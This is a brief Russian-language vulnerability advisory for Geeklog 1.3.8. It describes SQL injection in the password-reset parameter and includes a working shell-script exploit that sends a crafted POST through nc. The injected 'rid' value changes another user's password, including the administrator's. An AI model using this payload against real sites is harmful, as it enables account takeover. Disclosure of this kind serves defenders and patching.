Программа: Geeklog 1.3.8 

Уязвимость обнаружена в Geeklog. Злонамеренный пользователь может манипулировать SQL запросами.
Злонамеренный пользователь может манипулировать параметром «reqid» при обновлении пароля, чтобы изменить пароль произвольного пользователя. 

Пример/Эксплоит: 

#!/bin/sh

echo «POST /path/to/gl/users.php HTTP/1.0
Content-length: 50
Content-type: application/x-www-form-urlencoded

mode=setnewpwd&passwd=new&uid=2&rid=3’+or+uid=’1& » | nc localhost 80



Оставить мнение